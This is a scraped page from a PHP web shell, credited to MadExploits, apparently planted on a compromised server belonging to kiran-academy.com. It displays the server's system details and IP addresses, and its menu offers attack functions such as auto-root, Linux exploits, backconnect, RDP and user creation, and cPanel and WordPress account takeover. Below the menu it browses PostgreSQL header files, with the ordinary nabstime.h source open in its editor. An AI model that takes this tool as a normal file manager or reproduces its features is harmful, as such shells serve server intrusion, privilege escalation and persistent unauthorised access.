Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
pgsql /
server /
utils /
[ HOME SHELL ]
Name
Size
Permission
Action
acl.h
12.79
KB
-rw-r--r--
array.h
10.97
KB
-rw-r--r--
ascii.h
579
B
-rw-r--r--
attoptcache.h
725
B
-rw-r--r--
builtins.h
47.77
KB
-rw-r--r--
bytea.h
1.58
KB
-rw-r--r--
cash.h
2.07
KB
-rw-r--r--
catcache.h
7.51
KB
-rw-r--r--
combocid.h
698
B
-rw-r--r--
date.h
7.73
KB
-rw-r--r--
datetime.h
9.92
KB
-rw-r--r--
datum.h
1.48
KB
-rw-r--r--
dynahash.h
498
B
-rw-r--r--
dynamic_loader.h
648
B
-rw-r--r--
elog.h
12.56
KB
-rw-r--r--
errcodes.h
19.61
KB
-rw-r--r--
fmgroids.h
61.09
KB
-rw-r--r--
fmgrtab.h
1.15
KB
-rw-r--r--
formatting.h
1.41
KB
-rw-r--r--
geo_decls.h
15.86
KB
-rw-r--r--
guc.h
13.19
KB
-rw-r--r--
guc_tables.h
7.15
KB
-rw-r--r--
help_config.h
432
B
-rw-r--r--
hsearch.h
5.51
KB
-rw-r--r--
inet.h
2.66
KB
-rw-r--r--
int8.h
4.03
KB
-rw-r--r--
inval.h
1.81
KB
-rw-r--r--
json.h
916
B
-rw-r--r--
logtape.h
1.5
KB
-rw-r--r--
lsyscache.h
6.51
KB
-rw-r--r--
memutils.h
5.2
KB
-rw-r--r--
nabstime.h
5.79
KB
-rw-r--r--
numeric.h
1.88
KB
-rw-r--r--
palloc.h
3.92
KB
-rw-r--r--
pg_crc.h
4.36
KB
-rw-r--r--
pg_crc_tables.h
19.73
KB
-rw-r--r--
pg_locale.h
2.59
KB
-rw-r--r--
pg_lzcompress.h
2.97
KB
-rw-r--r--
pg_rusage.h
847
B
-rw-r--r--
plancache.h
8.02
KB
-rw-r--r--
portal.h
9.22
KB
-rw-r--r--
probes.h
37.93
KB
-rw-r--r--
ps_status.h
668
B
-rw-r--r--
rangetypes.h
7.4
KB
-rw-r--r--
rbtree.h
2.26
KB
-rw-r--r--
rel.h
12.27
KB
-rw-r--r--
relcache.h
3.17
KB
-rw-r--r--
relmapper.h
1.68
KB
-rw-r--r--
reltrigger.h
1.95
KB
-rw-r--r--
resowner.h
5.07
KB
-rw-r--r--
selfuncs.h
7.5
KB
-rw-r--r--
snapmgr.h
1.59
KB
-rw-r--r--
snapshot.h
2.59
KB
-rw-r--r--
sortsupport.h
5.3
KB
-rw-r--r--
spccache.h
556
B
-rw-r--r--
syscache.h
5.51
KB
-rw-r--r--
timestamp.h
9.5
KB
-rw-r--r--
tqual.h
3.5
KB
-rw-r--r--
tuplesort.h
4.62
KB
-rw-r--r--
tuplestore.h
3.14
KB
-rw-r--r--
typcache.h
4.26
KB
-rw-r--r--
tzparser.h
1.13
KB
-rw-r--r--
uuid.h
861
B
-rw-r--r--
varbit.h
4.27
KB
-rw-r--r--
xml.h
3.89
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nabstime.h
/*------------------------------------------------------------------------- * * nabstime.h * Definitions for the "new" abstime code. * * * Portions Copyright (c) 1996-2012, PostgreSQL Global Development Group * Portions Copyright (c) 1994, Regents of the University of California * * src/include/utils/nabstime.h * *------------------------------------------------------------------------- */ #ifndef NABSTIME_H #define NABSTIME_H #include <limits.h> #include "fmgr.h" #include "pgtime.h" /* ---------------------------------------------------------------- * * time types + support macros * * ---------------------------------------------------------------- */ /* * Although time_t generally is a long int on 64 bit systems, these two * types must be 4 bytes, because that's what pg_type.h assumes. They * should be yanked (long) before 2038 and be replaced by timestamp and * interval. */ typedef int32 AbsoluteTime; typedef int32 RelativeTime; typedef struct { int32 status; AbsoluteTime data[2]; } TimeIntervalData; typedef TimeIntervalData *TimeInterval; /* * Macros for fmgr-callable functions. */ #define DatumGetAbsoluteTime(X) ((AbsoluteTime) DatumGetInt32(X)) #define DatumGetRelativeTime(X) ((RelativeTime) DatumGetInt32(X)) #define DatumGetTimeInterval(X) ((TimeInterval) DatumGetPointer(X)) #define AbsoluteTimeGetDatum(X) Int32GetDatum(X) #define RelativeTimeGetDatum(X) Int32GetDatum(X) #define TimeIntervalGetDatum(X) PointerGetDatum(X) #define PG_GETARG_ABSOLUTETIME(n) DatumGetAbsoluteTime(PG_GETARG_DATUM(n)) #define PG_GETARG_RELATIVETIME(n) DatumGetRelativeTime(PG_GETARG_DATUM(n)) #define PG_GETARG_TIMEINTERVAL(n) DatumGetTimeInterval(PG_GETARG_DATUM(n)) #define PG_RETURN_ABSOLUTETIME(x) return AbsoluteTimeGetDatum(x) #define PG_RETURN_RELATIVETIME(x) return RelativeTimeGetDatum(x) #define PG_RETURN_TIMEINTERVAL(x) return TimeIntervalGetDatum(x) /* * Reserved values * Epoch is Unix system time zero, but needs to be kept as a reserved * value rather than converting to time since timezone calculations * might move it away from 1970-01-01 00:00:00Z - tgl 97/02/20 * * Pre-v6.1 code had large decimal numbers for reserved values. * These were chosen as special 32-bit bit patterns, * so redefine them explicitly using these bit patterns. - tgl 97/02/24 */ #define INVALID_ABSTIME ((AbsoluteTime) 0x7FFFFFFE) /* 2147483647 (2^31 - 1) */ #define NOEND_ABSTIME ((AbsoluteTime) 0x7FFFFFFC) /* 2147483645 (2^31 - 3) */ #define NOSTART_ABSTIME ((AbsoluteTime) INT_MIN) /* -2147483648 */ #define INVALID_RELTIME ((RelativeTime) 0x7FFFFFFE) /* 2147483647 (2^31 - 1) */ #define AbsoluteTimeIsValid(time) \ ((bool) ((time) != INVALID_ABSTIME)) /* * Because NOSTART_ABSTIME is defined as INT_MIN, there can't be any * AbsoluteTime values less than it. Therefore, we can code the test * "time > NOSTART_ABSTIME" as "time != NOSTART_ABSTIME", which avoids * compiler bugs on some platforms. --- tgl & az, 11/2000 */ #define AbsoluteTimeIsReal(time) \ ((bool) (((AbsoluteTime) (time)) < NOEND_ABSTIME && \ ((AbsoluteTime) (time)) != NOSTART_ABSTIME)) #define RelativeTimeIsValid(time) \ ((bool) (((RelativeTime) (time)) != INVALID_RELTIME)) /* * nabstime.c prototypes */ extern Datum abstimein(PG_FUNCTION_ARGS); extern Datum abstimeout(PG_FUNCTION_ARGS); extern Datum abstimerecv(PG_FUNCTION_ARGS); extern Datum abstimesend(PG_FUNCTION_ARGS); extern Datum abstimeeq(PG_FUNCTION_ARGS); extern Datum abstimene(PG_FUNCTION_ARGS); extern Datum abstimelt(PG_FUNCTION_ARGS); extern Datum abstimegt(PG_FUNCTION_ARGS); extern Datum abstimele(PG_FUNCTION_ARGS); extern Datum abstimege(PG_FUNCTION_ARGS); extern Datum abstime_finite(PG_FUNCTION_ARGS); extern Datum timestamp_abstime(PG_FUNCTION_ARGS); extern Datum abstime_timestamp(PG_FUNCTION_ARGS); extern Datum timestamptz_abstime(PG_FUNCTION_ARGS); extern Datum abstime_timestamptz(PG_FUNCTION_ARGS); extern Datum reltimein(PG_FUNCTION_ARGS); extern Datum reltimeout(PG_FUNCTION_ARGS); extern Datum reltimerecv(PG_FUNCTION_ARGS); extern Datum reltimesend(PG_FUNCTION_ARGS); extern Datum tintervalin(PG_FUNCTION_ARGS); extern Datum tintervalout(PG_FUNCTION_ARGS); extern Datum tintervalrecv(PG_FUNCTION_ARGS); extern Datum tintervalsend(PG_FUNCTION_ARGS); extern Datum interval_reltime(PG_FUNCTION_ARGS); extern Datum reltime_interval(PG_FUNCTION_ARGS); extern Datum mktinterval(PG_FUNCTION_ARGS); extern Datum timepl(PG_FUNCTION_ARGS); extern Datum timemi(PG_FUNCTION_ARGS); extern Datum intinterval(PG_FUNCTION_ARGS); extern Datum tintervalrel(PG_FUNCTION_ARGS); extern Datum timenow(PG_FUNCTION_ARGS); extern Datum reltimeeq(PG_FUNCTION_ARGS); extern Datum reltimene(PG_FUNCTION_ARGS); extern Datum reltimelt(PG_FUNCTION_ARGS); extern Datum reltimegt(PG_FUNCTION_ARGS); extern Datum reltimele(PG_FUNCTION_ARGS); extern Datum reltimege(PG_FUNCTION_ARGS); extern Datum tintervalsame(PG_FUNCTION_ARGS); extern Datum tintervaleq(PG_FUNCTION_ARGS); extern Datum tintervalne(PG_FUNCTION_ARGS); extern Datum tintervallt(PG_FUNCTION_ARGS); extern Datum tintervalgt(PG_FUNCTION_ARGS); extern Datum tintervalle(PG_FUNCTION_ARGS); extern Datum tintervalge(PG_FUNCTION_ARGS); extern Datum tintervalleneq(PG_FUNCTION_ARGS); extern Datum tintervallenne(PG_FUNCTION_ARGS); extern Datum tintervallenlt(PG_FUNCTION_ARGS); extern Datum tintervallengt(PG_FUNCTION_ARGS); extern Datum tintervallenle(PG_FUNCTION_ARGS); extern Datum tintervallenge(PG_FUNCTION_ARGS); extern Datum tintervalct(PG_FUNCTION_ARGS); extern Datum tintervalov(PG_FUNCTION_ARGS); extern Datum tintervalstart(PG_FUNCTION_ARGS); extern Datum tintervalend(PG_FUNCTION_ARGS); extern Datum timeofday(PG_FUNCTION_ARGS); /* non-fmgr-callable support routines */ extern AbsoluteTime GetCurrentAbsoluteTime(void); extern void abstime2tm(AbsoluteTime time, int *tzp, struct pg_tm * tm, char **tzn); #endif /* NABSTIME_H */
Close